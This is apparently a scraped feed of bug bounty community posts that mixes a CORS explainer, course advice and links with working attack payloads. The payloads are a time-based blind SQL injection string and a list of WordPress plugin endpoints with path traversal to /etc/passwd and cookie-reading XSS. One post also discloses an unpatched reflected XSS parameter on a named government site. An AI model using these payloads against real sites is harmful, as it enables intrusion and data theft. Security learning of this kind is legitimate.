Bug bounty Tips

🚨 Ever wonder why your API calls are getting blocked? Cross-Origin Resource Sharing (CORS) can be the culprit! When your JavaScript tries to communicate with an API on a different domain, the browser steps in to protect you. CORS ensures that only approved domains can make those requests. Learn how to manage these "preflight" checks and configure your server correctly to allow legitimate cross-origin requests. Hit save to stay in the know and never let CORS block your code! 🔒 👉 Follow us for more cybersecurity tips and tricks! 🌐 Visit us at www.cipherops.xyz 📲 @cipherops.tech https://www.instagram.com/p/C_fObBqShyT/?igsh=dWloN2lpeGx0ZHU0

Mindmap for tryhackme

Some of the DNS tools...

Tricky ASP blind SQL Injection in a login page. Payload👇 ';%20waitfor%20delay%20'0:0:6'%20--%20

Blackbox-Fuzzing of IoT Devices Using the Router TL-WR902AC as Example - https://tsmr.eu/blackbox-fuzzing.html

⚡️Wordpress Endpoints to look - check this if you have these plugin. ⚡️ /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd /wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd /wp-content/plugins/dzs-videogallery/admin/upload.php /wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php /wp-content/plugins/hd-webplayer/playlist.php /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd

What are the basic goal of good Reconnaissance

Analysis of CVE-2024-43044 — From file read to RCE in Jenkins through agents https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/

Join the discussion group guys https://t.me/bug_hunting_talks

see it really works easy 5 min finding

today i got an intresting reflected xss, in karnataka gov website /kn where the lang_name param is vulnerable

Thanks, guys for this suggestion I was stuck but seeing the money and the content provided by hackthebox academy, i am planning to first take the CPT as it covers almost all the topics and also so many people says that the exam. Is more tougher than oscp, so after reading all those articles and redit suggestion and youtube review, I am planning to first complete the CPT, once done later I will take the OSCP. And I also suggest you guys this only if you are a beginner or a intermediate, first take the alternative courses to oscp, and once you get things done, you will get confident and later you can pass the oscp in one time. Bec it cost a lot........ 🤑💰

Actually I am using foreign number soo not to worry if It's ban in India.

Later on I will make a group